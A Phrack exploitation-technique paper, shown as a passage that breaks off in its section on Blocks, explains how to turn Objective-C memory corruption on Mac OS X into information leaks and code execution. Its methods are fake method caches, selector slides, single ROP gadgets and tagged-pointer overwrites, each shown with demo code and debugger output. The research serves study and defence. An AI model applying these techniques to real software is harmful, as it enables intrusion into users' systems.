==Phrack Inc.== Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10 |=-----------------------------------------------------------------------=| |=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ by nemo ]=------------------------------=| |=-----------------------=[ nemo@felinemenace.org ]=---------------------=| |=-----------------------------------------------------------------------=| --[ Introduction Hello again reader. Over the years the exploitation process has obviously shifted in complexity. What once began with the straight forward case of turning a single bug into a reliable exploit has now evolved more towards combining vulnerability primitives together in an attempt to bypass each of the memory protection hurdles present on a modern day operating system. With this in mind, let's jump once again into the exploitation of Objective-C based memory corruption vulnerabilities in a modern time. Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn the most common Objective-C memory corruption primitive (an attacker controlled Objective-C method call) into control of EIP. If you have not read this paper, or if it's been a while and you need to refresh, it's probably wise to do so now, as the first half of this paper will only build on the techniques covered in the original [1]. Contrary to the beliefs of Ian Beer, the techniques in the original paper are still alive and kicking in modern times however some adjustment is needed depending on the context of the vulnerability. --[ Dangling Objective-C Method Calls As you're aware since you read my paper in [1], Objective-C method calls are implemented by passing "messages" to the receiver (object) via the objc_msgSend() API call. When Objective-C objects are allocated, storage for their instance variables is allocated on the native heap with malloc(). The first element in this space is a pointer to the class definition in the binary. This is typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A' NSObject". When dealing with bugs in Objective-C applications it is extremely common for this ISA pointer to be attacker controlled, resulting in an Objective-C method call to be performed on an attacker controlled memory location. This can occur when dealing with Use-After-Free conditions, heap overflows into objective-c objects, and even format bugs using the %@ format string character. In my original paper [1] I wrote about how to utilize this construct to perform a successful cache lookup for the selector value, resulting in control of EIP. An alternative route to gain EIP control is to make the Objective-C runtime think that it's finished looking through the entire cache and found no match for the SEL value passed in. In which case the runtime will attempt to resolve the method's address via the class definition (through the controlled ISA pointer) and once again use an EIP value from memory controlled by us. This method is longer however, and adds little benefit. But i digress, both of these methods are still completely valid in the most current version of Mac OS X at this time Mavericks, (10.10). While, at the time of the Phrack 0x42 release, this technique was fairly useful by itself, in modern times EIP/RIP control is only a small victory and in no way wins the battle of process control. This is due to the fact that even with direct control of EIP modern NX and ASLR makes it difficult to know a reliable absolute location in which we can store a payload and return to execute it. From what i've seen, the most commonly used technique to bypass this currently is to combine an EIP control primitive with an information leak of a .text address in order to construct a ROP chain (returning repeatedly into the text segment) which either executes the needed functionality, mprotect()'s some shellcode before executing it, or loads an existing executable or shared library. Under the right conditions, it is possible to skip some of these steps and turn a dangling Objective-C method call into both an information leak and execution control. In order to use this technique, we must first know the exact binary version in use on the target. Thankfully on Mac OS X this is usually pretty easy as automatic updates mean that most people are running the same binary version. The specifics of the technique differ depending on the architecture of the target system, as well as the location of the particular SEL string which is used in the dangling method call construct. Since we are already familiar with 32-bit internals, we will begin our investigation of dangling objc_msgSend() exploitation with the 32-bit runtime, before moving on to look at the changes in the new run-time on 64-bit. --[ 32-bit dangling objc_msgSend() Firstly, 32-bit processes utilize the old Objective-C runtime, so the specifics of the internals are identical to what is documented in my original paper. However, depending on the location of the module containing the selector string, the technique varies slightly. ----[ 32-bit Shared Region The shared-region is a mapping which is common to all processes on the system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this space. This file is generated by the "update_dyld_shared_cache" utility during system update, and contains a large selection of libraries which are commonly used on the system. The .paths files in "/var/db/dyld/shared_region_roots" dictate which files are contained within. The order in which each library is added to this file is randomized, therefore the offset into the file for a particular library cannot be relied on. Reading the file '/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files. For 32-bit processes, this file is mapped at the fixed address 0x90000000. At this location there is a structure which described the contents of the shared region. This technique, once again, revolves around the ability to control the ISA pointer, and to point it at a fake class struct in memory. In order to demonstrate how this works, a small sample Objective-C class was created (shown below). The complete example of this technique is included at the end of this paper in the uuencoded files blob. [leakme.m] #import "leakme.h" @implementation leakme -(void) log { printf("lol\n"); } @end In main.m, we create an instance of this object, and then use sprintf() to write out a string representation of the objects address, before converting it back with atol(). This is pretty confusing, but it's basically an easy way to trick the compiler into giving us a void pointer to the object. Type casting the object pointer directly will not compile with gcc. printf("[+] Class @ 0x%lx\n",l); sprintf(num,"%li",l); long *ptr = atol(num); ... printf("[+] Overwriting object\n"); *ptr = &fc; // isa ptr By overwriting the ISA pointer with the address of an allocation we control, we can easily simulate a vulnerable scenario. Obviously in the real world things are not that easy. We need to know the address of an allocation which we control. There are a variety of ways this can be accomplished. Some examples of these are: - Using a leak to read a pointer out of memory. - Abusing language weaknesses to infer an address. [2] - Abuse the predictable nature of large allocations. However, these concepts are the topic of many other discussions and not relevant to this particular technique. As a quick refresher, the first thing the Objective-C runtime does when attempting to call a method for an object (objc_msgSend()) is to retrieve the location of the method cache for the object. This is done by offsetting the ISA pointer by 0x20 and reading the pointer at this location. To control this cache pointer we use the following structure: struct fakecache { char pad[0x20]; long cache_ptr; }; In the example code we use a separate allocation for the fakecache struct and the cache itself. However in a real scenario the address of the cache itself would most likely be the same address as the fakecache offset by 0x24. This would allow us to use a single allocation, and therefore a single address, reducing the constraints of the exploit. Also, in a real world case we could leak the address of the cache_ptr, then subtract 0x20 from it's address. This would allow us to shave 0x20 bytes off of the buffer we need to control. Next, objc_msgSend() traverses the cache looking for a cached method call matching the desired implementation. This is done by iterating through a series of pointers to cache entries. Each entry contains a SEL which matches the cached method SEL in the .text segment of the Objective-C binary. By comparing this SEL value with the SEL value passed to objc_msgSend() the matching entry can be located and used. Rather than iterating through every pointer to find the appropriate cache entry each time however, a mask is applied to the selector pointer. The masked off bits are then shifted and used as an index into the cache table entry pointer array. Then after this index is used, each entry is inspected. This means that multiple entries can have the same index, however it greatly reduces the search time of the cache. Controlling the mask provides us with the mechanism we need to create a leak. Ok, so going back to the mask. In my original Objective-C paper, we set the mask to 0. This forced the runtime to look directly past the mask regardless of what value the SEL had. In this case however, we want to abuse the mask in order to isolate the "randomized" unpredictable bits in the selector pointer value (SEL). Below, we can see a "real" SEL value from a 10.10 system, which is located in the shared_region. (lldb) x/s $ecx 0x90f3f86e: "length" Since we know that the shared region begins at 0x90000000 we know that first octet will always be 0x9. We also know that the offset into the page which contains the SEL will always be the same, therefore the last 3 octets 0x86e will be the same for the binary version we retrieve the SEL value from. However, we cannot count on the rest of the SEL value being the same on the system we are running our exploit against. For the value 0x90f3f86e we can see the bit pattern looks as follows: 9 0 f 3 f 8 6 e 1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e Based on what we just discussed the mask which would retrieve the bits we care about looks as follows: 0 f f f f 0 0 0 0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000 However, since objc_msgSend() shifts the SEL 2 to the right prior to applying the mask, we must shift our mask to account for this. This leaves us with: 0 3 f f f c 0 0 0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00 As you remember, objc_msgSend() applies the following calculation to generate the index into the cache entries: index = (SEL >> 2) & mask Filling in the values for this leaves us with an index like: index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00 This means that for our particular SEL value the runtime will index 0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from this location. It will then dereference the pointer and check for a SEL match at that location. By creating a giant cache slide, containing all permutations of slide, we can make sure that this location contains the right value for slide. In the 32-bit runtime (the old runtime) the cache index is used to retrieve a pointer to a cache_entry from an array of pointers. (buckets). In our example code (main.m) we set the buckets array up as follows: long *buckets = malloc((CACHESIZE + 1) * sizeof(void *)); However, in a typical exploitation scenario, this array would be part of the single large allocation which we control. For each of the buckets pointers, a cache entry must be allocated. In the example code we can use the following struct for each of these entries: struct cacheentry { long sel; long pad; long eip; }; Each of these structures must be populated with a different SEL and EIP value depending on its index into the table. For each of the possible index values, we add the (unshifted) randomized bits to the SEL base. This way the appropriate SEL is guaranteed to match after the mask is applied and used to index the table. For the EIP value, we can utilize the fact that the string table containing the SEL string is always going to be relative to the .text segment within the same binary. The diagram below shows this more clearly. ,_______________,<--- Mach-O base address | | | mach-o header | +---------------+ | |<--- SEL in string table, relative to base | string table | /\ Relative offset +---------------+ \/ from SEL to ROP gadgets | |<--- ROP gadget in .text segment | .text segment | '---------------' For each possible entry in the table, the EIP value must be set to the appropriate address relative to the SEL value used. The quickest way i know to calculate these values is to break on the objc_msgSend function and dump the current SEL value. In lldb this is simple a case of using "reg read ecx". Next, "target module list -a $ecx" provides us with the module base. By subtracting the absolute SEL address from the module base we can get the relative offset within the module. This can be repeated for the gadget address within the same module. Next, when populating the table, we simple need to add these two relative offsets to our potential module base candidate. We increment the module base candidate for each entry in the table. By populating our cache slide in this way we are guaranteed the execution of a single ROP gadget within the module that our SEL is in. This can be enough for us to succeed. We will look into ways to use this construct later. Obviously the allocation used for this 32-bit technique is very large. To calculate the size of the cache slide which we need to generate we need to look at the size of the shared region. The shared region always starts at 0x90000000, but the first module inside the shared region starts at 0x90008000. The end of the shared region depends on the number of modules loaded in the shared region. On the latest version of Mac OS X at this time, the end of the shared region is located at 0x9c391000. The bit patterns for these are shown below. 10010000 00000000 10000000 00000000 :: SR START -- 0x90008000 10011100 00111001 00010000 00000000 :: SR END -- 0x9C391000 00001111 11111111 11110000 00000000 :: MASK UNSHIFTED If we compare this to the unshifted mask, and mask off the bits we care about we get the following values for our potential index values. 00000000 00000000 00100000 00000000 -- smallest index value - 0x2000 00000011 00001110 01000100 00000000 -- biggest index value - 0x30E4400 Since the buckets array is an array of 4 byte pointer values we can multiple the largest index by 4, giving us 0xc391000. Each cache entry pointed to by a bucket is 12 bytes in size. This means that the size of the cache entry array is 0x24ab3000. By adding these two values together we get the total size of our cache slide, 0x30e44000 bytes. Allocations of this size can be difficult to make depending on the target application. However, also due to the size, they are predictably placed within the address space. This buffer can be made from JavaScript for example. ----[ Uncommon 32-bit Libraries Libraries which are not contained within the shared region are mapped in by the linker when an executable is loaded that requires them as a dependency. The location of these modules is always relative to the end of the executable file and is loaded in the order specified in the LC_LOAD_DYLIB header. When loading the executable file, the kernel generates a randomized slide value for ASLR. This value is added to the desired segment load addresses in the executable (if it's compiled with PIE) and then the executable is re-based to that location. uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) + slide; The slide value is calculated by the kernel and then passed to the main function of the dynamic loader. The following algorithm is responsible for generating the slide value. aslr_offset = (unsigned int)random(); max_slide_pages = vm_map_get_max_aslr_slide_pages(map); aslr_offset %= max_slide_pages; aslr_offset <<= vm_map_page_shift(map); where: uint64_t vm_map_get_max_aslr_slide_pages(vm_map_t map) { return (1 << (vm_map_is_64bit(map) ? 16 : 8)); } int vm_map_page_shift( vm_map_t map) { return VM_MAP_PAGE_SHIFT(map); } #define VM_MAP_PAGE_SHIFT(map) \ ((map) ? (map)->hdr.page_shift : PAGE_SHIFT) #define PAGE_SHIFT I386_PGSHIFT #define I386_PGSHIFT 12 So for example, a random() value of 0xdeadbeef, would end up as the value 0xef000. With the following calculation: slide = ((0xdeadbeef % (1<<8)) << 12) slide = 0xef000 The gcc compiler and llvm both (by default) use a load address of 0x1000 for the text section of an executable. So for the slide value 0xef000 the executable file would be based at 0x1000 + 0xef000 = 0xf0000. This means that for the most part, you're dealing with roughly 1 byte of unpredictable bits. Depending on the number of libraries loaded which are outside of the shared region, this fluctuates, however libraries are always loaded in the order stipulated by the executable itself, so this is fairly predictable. For our dangling objc_msgSend technique this means that our mask fluctuates depending on the target. In the best case, masking of the single byte in the address can be achieved by using the mask (0x000ff000 >> 2) == 0x3fc00. --[ 64-bit dangling objc_msgSend() The 64-bit version of this technique is quite different to it's 32-bit brethren. This is mostly due to the fact that 64-bit processes use a brethren. This is mostly due to the fact that 64-bit processes use a whole new version of the runtime. In the new runtime, the objc_class structure is no longer a basic C structure. Instead it uses C++ intrinsics to include methods. The memory footprint for the new class is shown below. struct objc_class : objc_object { // Class ISA; Class superclass; cache_t cache; // formerly cache pointer and vtable class_data_bits_t bits; // class_rw_t * plus custom rr/alloc flags ... } The cache_t struct looks as follows: struct cache_t { struct bucket_t *_buckets; mask_t _mask; mask_t _occupied; ... } and a bucket_t struct looks like: struct bucket_t { private: cache_key_t _key; IMP _imp; ... } Putting this together. The main thing that has changed regarding the cache lookup, rather than an array of pointers to cache entries, there is simply a single pointer to an array of SEL + method address entries at offset 0x10 into the structure. Following this, there's the mask, followed by an occupied field indicating that entries in the cache exist. The critical difference in the run-time is the way the mask is used to index into this table. Rather than the (SEL >> 2) value in the 32-bit runtime, the index is calculated via ((SEL & mask) << 4). This means, if we were to abuse the mask in a similar way to the 32-bit technique we would need a mask of 0xffff0000 in order to isolate the randomized bits. Obviously even if we were able to make an allocation big enough to contain the cache slide necessary for this it would be such a time consuming act to populate 4gb worth of cache entries to catch the index that this is not really a feasible process. Instead we must utilize an additional characteristic of the new runtime. The objc_msgSend() call at a high level looks as follows: ISA = *class_ptr; offset = ((SEL & ISA->mask) << 4); while(ISA->buckets[offset].SEL != 0) { if(ISA->buckets[offset].SEL == SEL) { return ISA->buckets[offset].method(args); } else { offset--; continue; } } This means that if we once again create a large slide containing entries for all possible randomized bits, we simply need to point (using the index we control) the runtime to end of our slide, and let it walk backwards until it finds a match. ----[ 64-bit Shared Region In order to investigate this technique, we will begin again by looking at the shared region on 64-bit processes. The shared region starts at the address 0x7FFF80000000. Once again a cache file is mapped in, this time from /var/db/dyld/dyld_shared_cache_x86_64. This file is, once again, randomized upon creation, however in 64-bit processes there is also a random slide added to the file when it is mapped in. This is calculated using sizeof(shared_region) - sizeof(cache file) as the max. As far as our technique goes however this does not really change very much. Calculating the mask value for this technique can be challenging. There are a few constraints which we must work against in order to index our bucket list to the last entry. To investigate this we will take a typical SEL value 0x00007fff99f88447 The bit pattern is broke down below. SEL: 0x00 00 7f ff 99 f8 84 47 00000000 00000000 01111111 11111111 10011001 11111000 10000100 01000111 Unfortunately the mask variable is only 4 bytes long. This means that the predictable bits in the upper 32-bits of the SEL are not available to us. Also, the last 12 static bits (offset into page - 0x447) would result in an index that is too small. If we used those bits we would not have a large enough offset to index to the end of the slide. Luckily, we have one single static bit in position 33 which we can count on being set. We can take advantage of this bit with the following mask. Mask: 0x00 00 00 00 80 00 00 00 00000000 00000000 00000000 00000000 10000000 00000000 00000000 00000000 Applying this bit to any SEL value within the shared region will guarantee the offset 0x80000000. Clearly this value is way beyond the end of our required slide, however since we also control the pointer to the bucket slide, we can subtract (0x80000000 - sizeof(cache)) from the pointer value to force it to point to the right location. The example code main64.m demonstrates this technique. In this code, we use a fakecache structure to control the initial cache lookup. A pad is used to correctly position the bucket pointer and mask. struct fakecache { char pad[0x10]; long bucketptr; long mask; }; Next, we allocate an array of cache entry structs in order to hold our SEL slide. Obviously in a real attack all these elements would be in a single allocation, however for this example we will split them up for clarity. struct cacheentry { long sel; long rip; }; struct cacheentry *buckets = malloc((NUMBUCKETS+1) * sizeof(struct cacheentry)); Initializing each of these elements is simply a case of incrementing the random value added to the SEL each time, and populating each entry. Again, the RIP value is calculated by adding a relative offset to the SEL in order to locate our ROP gadget. for(slide = 0; slide < NUMBUCKETS ; slide++) { buckets[slide].sel = BASESEL + (slide * 0x1000); buckets[slide].rip = buckets[slide].sel - 75654446; } ----[ Uncommon 64-bit Libraries Once again, libraries which are not within the shared region are mapped directly after the executable image in memory. Typically the text segment address generated by the compiler is 0x100000000. The same code is used to to generate the slide that we looked at earlier in the 32-bit section. Here is an example of a slide for a 64-bit process with the random() value of 0xdeadbeef. slide = ((0xdeadbeef % (1<<16)) << 12) slide = 0xbeef000 example SEL = 0x10beef447 As you can see, in this example, there is no predictable bit in the lower 32-bits of the SEL which we can rely on to index to the end of our table. Our only option here is to utilize the random bits in the SEL. We can do this by repeating the entire spectrum of randomized values in our slide multiple times. This way depending on the value of the random bits a different offset will occur into the slide, however in most scenarios it will result in finding one instance of the correct entry. --[ Single Gadget Exploitation Strategies Now that we've looked at how to get execution to a predictable location of our choice, the next step is to look at some ways to utilize this to our advantage. Obviously there is an abundance of ways that this can be utilized, but the following 3 methods are ways that I have seen succeed in real life. ----[ Return SEL Gadget At the moment when we gain execution control using this technique a register value contains the SEL pointer value. We can use this fact to our advantage. For example, for 32-bit code, the following gadget could take advantage of this. 00000000 89C8 mov eax,ecx 00000002 5E pop esi 00000003 5D pop ebp 00000004 C3 ret The gadget above moves the SEL pointer value into the eax register, obviously on function return this register is treated as the return value. Next it restores EBP from the stack and uses the ret instruction to return from the function. This results in, rather than the expected return value for whatever Objective-C method was dangling, the SEL value is returned. This is only a useful approach if we are able to retrieve the value from this context and utilize it to re-trigger the bug. In the example code provided, the use of this gadget causes the SEL value to be printed, rather than the length of the NSString which is intended. You can see the result of this below. -[nemo@objcbox:code]$ ./leak [+] buckets is 0x10000000 size. [+] cacheentry is 0x30000000 size. [+] Setting up buckets [+] Done [+] Class @ 0x78622240 [+] Overwriting object [+] Calling method String length: 0x93371b88 Likewise, in some cases it may not make sense to return the SEL directly. If it is not possible to retrieve the leaked value upon return it may make more sense to execute a gadget which writes ecx somewhere in memory. For example in a web browser context, writing the ecx register into a JavaScript array which is attacker controlled may result in the ability to "collect" this value from JavaScript context and re-trigger the bug. ----[ Self Modifying ROP Another potential use of the single gadget execution primitive is to use the ecx register containing SEL to modify the rest of a ROP chain prior to pivoting to use it. I have never personally been successful with this, however I have seen this done in a friends exploit. Finding a gadget which accomplishes all this is extremely challenging. ----[ Arbitrary Write Gadget The final method for using a single gadget to continue the exploitation process is to turn the execution primitive into an arbitrary write primitive. It is usually fairly straight forward to find a gadget which allows you to write any high value to a fixed location. By positioning something at this location (eg 0x0d0d0d0d) this single write can be leveraged to escalate the available functionality. For example, in a web context. Positioning a JavaScript array or string at this location then writing to the length field can be enough to gain an arbitrary read/write primitive from JavaScript. This is easily enough to finish the exploitation process. Outside of the browser context there are still a variety of length encoded data types which can be used for this. Specifically to Objective-C, the NSMutableArray/NSArray classes work this way. --[ Tagged Pointers One of the new features added to the Objective-C runtime is the usage of "tagged pointers" to conserve resources. Tagged pointers take advantage of the fact that the system memory allocator will align pointers handed out on natural alignment boundaries. This means that the low bit will never be set. (lldb) print (long)malloc_good_size(1) (long) $0 = 16 The runtime takes advantage of this lower bit in order to indicate that the pointer value is not to be treated as a regular pointer, and instead, bits 61-63 are used as an index into a table of potential ISA pointers, registered with the system. This means the first 60 bits can then by used to store the object payload itself inline. Tagged pointer layout 11111111 11111111 11111111 11111111 11111111 11111111 11111111 1111[111][1] | | | tag index As mentioned, index bits index into a table of potential object types. The default types registered with the runtime is shown below. OBJC_TAG_NSAtom = 0, OBJC_TAG_1 = 1, OBJC_TAG_NSString = 2, OBJC_TAG_NSNumber = 3, OBJC_TAG_NSIndexPath = 4, OBJC_TAG_NSManagedObjectID = 5, OBJC_TAG_NSDate = 6, OBJC_TAG_7 = 7 It is possible for a developer to add their own types to the table, however it is very uncommon for anyone to do this. The guide at [3] clearly illustrates the mechanics of tagged pointers, if you require more information. Now that we've looked at how tagged pointers work, we will investigate some of them from an exploitation perspective. ----[ Tagged NSAtom NSAtom is an extremely handy object type for exploitation. In order to use a tagged NSAtom, we simply need the low bit set indicating a tagged pointer, and then no bits set in the index bits. The value 0x1 by itself for example will satisfy this. The beautiful thing about the NSAtom class is that calling any method name on this class will result in success. The example code below simply calls the method initWithUTF8String on the object 0x1. Clearly this is not a valid pointer, and instead is treated as an NSAtom. Any method name could be used and the result would still be 1. int main(int argc, const char * argv[]) { printf("[+] NSAtom returned: %u\n",[1 initWithUTF8String:"lol"]); return 0; } $ ./nsatom [+] NSAtom returned: 1 As you can imagine, this behavior can be extremely useful for CoE or general exploitation. An example scenario would be, if you are forced to write through several Objective-C object pointers on the path to an overwrite target, any method call on those objects would require valid pointers/fake object setup. However with the NSAtom tagged pointer type, simply replacing these pointers with the value 0x1 can be enough to stop the crash and take advantage of the overwrite target. Also, in extremely specific cases, the fact that this object returns true can be used to manipulate the path of the program. ----[ Tagged NSString The next tagged pointer type we will investigate is the tagged NSString. With the new runtime, when a NSString is created, the size of the string during initialization dictates the type of storage for the string. String which are greater than 7 bytes in length are stored on the heap in a typical Objective-C NSString object. However, for strings of 7-bytes or less, a tagged pointer with the index 2 is used. The bitpattern for a tagged NSString is shown below. It is comprised of 7 bytes of string data, followed by 4 bits for the length, 3-bit for the index into the tagged pointer types array and finally the low bit to indicate tagged pointer type. <-------------------[ String Data ]--------------------> 11111111111111111111111111111111111111111111111111111111[1111][010][1] [strlen]<----> | | | tag index: 02 The first scenario in which we can abuse the properties of a tagged NSString is a partial overwrite into an untagged NSString. The example code included with this paper (nsstring1.m) demonstrates this. In this code (shown below) we create an NSString (s) using the C string contents "thisisaverylongstringnottagged". Since this is not 7 or less bytes in length this string is stored on the heap, and the object pointer points to this. We use the character pointer (ptr) to simulate a 1 byte write into the least significant byte of the object pointer. This condition can occur from either a controlled overflow, or an actual 1 byte off-by-one. We write the value 0xf5 to this byte, and then print the length and contents of the string. int main(int argc, const char * argv[]) { NSString *s = [[NSString alloc] initWithUTF8String:"thisisaverylongstringnottagged"]; char *ptr = (char *)&s; *ptr = 0xf5; // NSString Tagged printf("[+] NSString @ 0x%lx\n",(unsigned long)s); printf("[+] String length: 0x%lx\n",(unsigned long)[s length]); NSLog(@"%@",s); return 0; } The value 0xf5 in the least significant byte has the following bit pattern: [1111][010][1] As you can see, this leaves us with a string length of 0xf, an index of 0x2 and the LSB set to indicate a tagged pointer. By only using a partial overwrite, we have left the first 7 bytes of the pointer untouched. As you can see from the output below, the length of the string is 0xf (15) after this overwrite. This means that when the NSLog() attempts to print the string contents, 15 bytes of data are pulled out starting from the inline data. This leaks the address of the object. If our target allows us to retrieve a string value and use it, we can turn a one byte overwrite into an info leak primitive. $ ./nsstring1 [+] NSString @ 0x7fc0db4116f5 [+] String length: 0xf 2015-04-04 07:47:26.815 nsstring1[13335:92489992] eeeeeee 3eIjuaj The next scenario which we will investigate involves overflowing into a tagged NSString, rather than an un-tagged variant. The example code nsstring2.m demonstrates this. In this code, we initialize an NSString with the contents "AAAAAAA". Since this is only 7 bytes of c-string it guarantees that the NSString will be a tagged type. This means it will contain the value: 0x4141414141414175 Essentially the first 7 bytes are taken up with our "A" contents. The last byte contains the length (7) followed by the bitpattern to indicate NSString type of tagged pointer. Next, we once again simulate a single byte overflow into the object pointer. This time we write the value 0x00, which is a common primitive in real life due to off-by-one string operations. This forcefully unsets the tagged LSB in the pointer, turning the tagged string into an un-tagged type. Finally we call the length method on the object. int main(int argc, const char * argv[]) { NSString *s = [[NSString alloc] initWithUTF8String:"AAAAAAA"]; char *ptr = (char *)&s; *ptr = 0x00; // un-tag printf("[+] NSString @ 0x%lx\n",(unsigned long)s); printf("[+] String length: 0x%lx\n",(unsigned long)[s length]); NSLog(@"%@",s); return 0; } As you can imagine, the runtime now treats our tagged object as untagged. This means that the tagged pointer is now treated as a real pointer. If we were able to control the contents of the NSString on initialization, this would present us with direct control over the object cache lookup, allowing us to use the construct presented earlier in the paper to turn this into code execution. (lldb) r Process 13636 launched: './nsstring2' (x86_64) [+] NSString @ 0x4141414141414100 Process 13636 stopped * thread #1: tid = 0x5834fc3, 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT) frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23 libobjc.A.dylib`objc_msgSend + 23: -> 0x7fff96c210d7: andq (%rdi), %r11 0x7fff96c210da: movq %rsi, %r10 0x7fff96c210dd: andl 0x18(%r11), %r10d 0x7fff96c210e1: shlq $0x4, %r10 (lldb) reg read rdi rdi = 0x4141414141414100 ----[ Tagged NSNumber As you can imagine, the NSNumber case is very similar to that of the NSString. Any number value which can be contained in the first 7 bytes of the pointer is stores inline as a tagged NSNumber, rather than performing an allocation and storing the number on the heap. The sample code nsnumber1.c demonstrates,once again, a single byte overwrite into a tagged pointer, containing an inline nsnumber. In this code, we begin by instantiating an NSNumber containing the value 0xdeadbeeffeedface. The contents of this number are unimportant, however clearly the number is large enough that it would not fit into the upper bytes of a tagged pointer, therefore this NSNumber is stored on the heap in typical Objective-C fashion. Next, we write the value 0xf7 to the lower byte of the object pointer. Once again this converts the un-tagged object pointer into a tagged type, while leaving the upper bits in-tact. Finally, we log the contents of the number using the method unsignedLongLongValue. int main(int argc, const char * argv[]) { NSNumber *n = [NSNumber numberWithInteger:0xdeadbeeffeedface]; char *ptr = (char *)&n; *ptr = 0xf7; NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]); return 0; } As you can see from the output below, rather than printing the initialized contents (0xdeadbeeffeedface) the NSLog call displays the object pointer value itself, once again creating an information leak of this value. $ ./nsnumber1 2015-04-04 09:26:58.701 nsnumber1[14663:92514549] 0x7fd6134116 The final tagged pointer example nsnumber2.m demonstrates the counter case to this. In this code an NSNumber is instantiated containing the value 0x0041414141414141. As you can see from the leading NULL byte, this value is small enough that it fits within the first 7 bytes of the object pointer. Therefore, this object is created as a tagged pointer with the value: 0x4141414141414107 We once again truncate the final byte using a character pointer, removing the tagged bit before calling a method on it (unsignedLongLongValue). int main(int argc, const char * argv[]) { NSNumber *n = [NSNumber numberWithInteger:0x0041414141414141]; char *ptr = (char *)&n; *ptr = 0x00; NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]); return 0; } When the method call is made, the runtime treats the numbers contents as a pointer, and leaves us with a dangling Objective-C message send call, which we can once again abuse to control execution. Process 14636 launched: './nsnumber2' (x86_64) Process 14636 stopped * thread #1: tid = 0x583a67f, 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT) frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23 libobjc.A.dylib`objc_msgSend + 23: -> 0x7fff96c210d7: andq (%rdi), %r11 0x7fff96c210da: movq %rsi, %r10 0x7fff96c210dd: andl 0x18(%r11), %r10d 0x7fff96c210e1: shlq $0x4, %r10 (lldb) reg read rdi rdi = 0x4141414141414100 ----[ Additional Tagged Types The additional types in the table have very unique properties. I will leave it as an exercise to the reader to investigate each of these types for useful ways they can be used from an exploitation perspective. --[ Blocks So, Apple being Apple, decided the tried and tested C standard wasn't good enough for their magical super fantastic operating system and went ahead and modified it. They did this by adding a new construct called Blocks. For anyone familiar with the concept of an anonymous function reference in Perl, or a lambda function in Python, this is essentially what a Block is. You can read about blocks in detail in Apple's guide [4]. TL;DR though, a block basically uses the "^" operator to declare a special type of function pointer where the body of the function can be defined inline. This is mostly a syntactic feature, but has a few runtime uses as well. They can be passed to other functions just like a function pointer, and can access global data, or data relative to the current executing state they are defined in. Syntactically blocks are very similar to ecmascript Closures, however internally they function a little differently as you'll see. --[ Sample Block Code Ok let's take a look at how Blocks are defined. Apple's guide [4] provides the following little example code: int main(int ac, char **av) { int multiplier = 7; int (^myBlock)(int) = ^(int num) { return num * multiplier; }; printf("%d\n", myBlock(3)); } As you can see, this code defines a block called myBlock which takes an integer argument "num" and multiplies it with a value "multiplier" taken from the stack of the main function where the block was declared. The myBlock Block is then called passing the value 3. As expected when executed the block is entered and returns the multiplication of 7 * 3. -[dcbz@squee:~/code/blocks]$ gcc block.c -o block -[dcbz@squee:~/code/blocks]$ ./block 21 Note, nothing fancy is needed to compile this, Apple's built in compiler supports Blocks out of the box. At first glance, i expected this feature to be syntactical only. I thought the compiler would create a function, and then just add a single call instruction in the appropriate places. Or maybe a function pointer if reassignment was required. However if we walk through the assembly listing for this trivial program we can see that is not even close to the case. First we have the basic function prologue as expected... EntryPoint: push rbp ; XREF=0x100000e2f mov rbp, rsp sub rsp, 0x50 Next argv/argc are moved into stack variables. mov rax, rsi mov ecx, edi mov dword [ss:rbp-0x50+var_76], ecx mov qword [ss:rbp-0x50+var_64], rax The value 0x7 is stored in a stack variable to be referenced by the Block. This it the "multiplier" variable. mov dword [ss:rbp-0x50+var_12], 0x7 Ok now we come to the meat of the Block implementation. As you will see, there's a little bit of code here, much more than expected. Before we continue tracing it we need to understand a little bit more about Block internals. The free chapter from the book Advanced Mac OS X Programming: The Big Nerd Ranch Guide [5] has a really nice write up on the internals of Blocks which makes this next bit really clear. Basically there are two structures defined for every Block created, the block_descriptor and block_literal as well as the function containing the actual byte-code implementation of the Block. The block literal structure is the most important structure for us to understand. Majority of the assembly listing we are tracing is used to populate this structure appropriately. The definition for the structure is shown below: struct block_literal_NAME { void *isa; int flags; int reserved; void (*invoke)(void *literal, ...); struct block_descriptor_NAME *descriptor; /* referenced captured variables follow */ }; Basically, the use of this structure is to turn our Block into a pseudo objective-c object. As you can see the typical 'isa' pointer at offset 0 contains a pointer to the base class struct for the object. In the listing below, we can see that the block_literal struct is being created at offset rbp-0x50+var_16. The ISA pointer is populated with a pointer to the class "NSConcreteStackBlock". lea rax, qword [ss:rbp-0x50+var_16] mov rcx, qword [ds:imp___got___NSConcreteStackBlock] lea rcx, qword [ds:rcx] mov qword [ss:rbp-0x50+var_16], rcx As described in [5], this class indicates that the Block is to be stored on the stack. Other possible alternative base classes are: NSConcreteGlobalBlock for global Blocks, NSConcreteMallocBlock for heap based Blocks, NSConcreteAutoBlock for Blocks affected by garbage collection and NSConcreteFinalizingBlock for blocks which have a "finalizer"/destructor which must be run apon garbage collection. Cross referencing these class structs can give us a pretty good indication where Blocks are used in a binary, and also their location in memory at runtime. mov dword [ss:rbp-0x50+var_24], 0x40000000 The next element populated is the flags. I won't go into this too much because the write-up at [5] covers it perfectly. The flags enum stores some meta information about the Block including garbage collection settings and whether or not the Block is global. Next the reserved field is set to 0. mov dword [ss:rbp-0x50+var_28], 0x0 The main_block_invoke_1 function is the invoke() method for this Block. It basically contains the compiled instructions for the block itself. As you will see it is called later when 